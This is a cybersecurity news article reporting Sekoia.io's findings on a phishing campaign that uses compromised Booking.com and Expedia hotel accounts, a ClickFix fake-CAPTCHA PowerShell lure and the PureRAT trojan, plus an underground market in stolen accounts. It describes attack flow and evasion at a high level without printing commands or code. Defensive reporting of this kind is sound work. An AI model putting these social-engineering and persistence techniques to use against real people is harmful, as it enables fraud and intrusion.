Ddos 
Threat analysts at Sekoia.io have uncovered a global phishing operation that has been targeting the hospitality industry through compromised Booking.com and Expedia accounts, in a campaign that blends social engineering, malware delivery, and financial fraud. The investigation reveals that attackers are exploiting stolen hotel credentials to distribute banking phishing messages and infect systems with the PureRAT remote access trojan.
The campaign—tracked by Sekoia’s Threat Detection and Response (TDR) team since April 2025—exploits hotel booking platforms as the initial entry point. Attackers first compromise hotel or travel agency accounts, then use these to contact unsuspecting guests with authentic reservation data to enhance credibility.
“This activity proved particularly effective because the threat actor possessed customer data, including personal identifiers and reservation details, which further increased the credibility of the phishing attempts.”
The emails typically mimic legitimate Booking.com communications, using subject lines such as “New guest message linked to your listing” or “New last-minute booking.” When victims click the embedded link, they are redirected through multiple domains to a malicious page disguised as Booking.com’s administration portal, initiating what Sekoia calls the ClickFix infection chain.
The campaign’s infection flow involves a series of sophisticated steps designed to evade detection and ensure persistence on the victim’s machine.
Sekoia explains, “The malicious email sent by the attacker contained a URL that pointed to a redirection infrastructure… The objective is to redirect the user to the same URL but over HTTP… which instantly forwarded the victim to the ClickFix URL.”
This final landing page mimics Booking.com’s extranet and prompts the victim to solve a fake CAPTCHA. The trap? The user is asked to copy and execute a PowerShell command — the now infamous “ClickFix reCAPTCHA” technique.
“The copied and subsequently executed command included PowerShell instructions to compromise the machine with malware.”
Once executed, the command downloads a ZIP archive containing a Windows executable and several DLLs. These components establish persistence via registry keys and startup shortcuts, before deploying PureRAT, a powerful remote access trojan capable of file theft, screen capture, keylogging, and command execution.
The investigation revealed that PureRAT, also known as PureHVNC or ResolverRAT, is being sold as part of a Malware-as-a-Service (MaaS) package developed by PureCoder, a known cybercrime vendor.
PureRAT provides remote desktop access, microphone and webcam capture, data exfiltration, and modular plugin support. It communicates over encrypted TCP/TLS channels using ports 56001–56003 and employs reflective DLL loading to remain fileless and undetectable.
This level of obfuscation, combined with the use of legitimate Windows components like AddInProcess32.exe, makes the campaign particularly stealthy.
Beyond the technical infection chain, Sekoia’s analysts found that a large underground market has emerged to trade compromised Booking.com and Expedia accounts, complete with customer data, hotel contact lists, and authentication cookies.
Attackers use infostealer malware to harvest credentials from hotel staff, which are later resold in bulk on Russian-speaking cybercrime forums. Depending on the account’s access level, prices range from a few dollars to several thousand for high-value administrator credentials managing multiple properties.
The threat actor “moderator_booking”, who has been active across forums such as Exploit.in and LolzTeam, reportedly leads a team that has “earned over $20 million in this field.”
Attackers use WhatsApp or email to contact hotel customers directly, urging them to “verify payment details” on a phishing page identical to Booking.com’s interface. The page, hosted on bulletproof Russian infrastructure, is protected by Cloudflare’s Turnstile antibot and designed to steal victims’ banking credentials.
This infrastructure, traced to AS216341 (OPTIMA LLC) in Russia, appears to serve as a bulletproof hosting provider for financial phishing operations.
Related Posts:
- From Infostealer to Full RAT: Huntress Uncovers a Multi-Stage Malware Attack Deploying PureRAT
- Ghost Crypt & PureRAT: New Stealthy Malware Targets Accounting Firm via “Process Hypnosis”
- Google Uncovers Massive Phishing Scam Exploiting Booking.com Users
- Booking.com Spoofed in ClickFix Malware Surge Targeting Hotels and Travel Sector
- Google Uncovers Massive Phishing Scam Exploiting Booking.com Users
Donate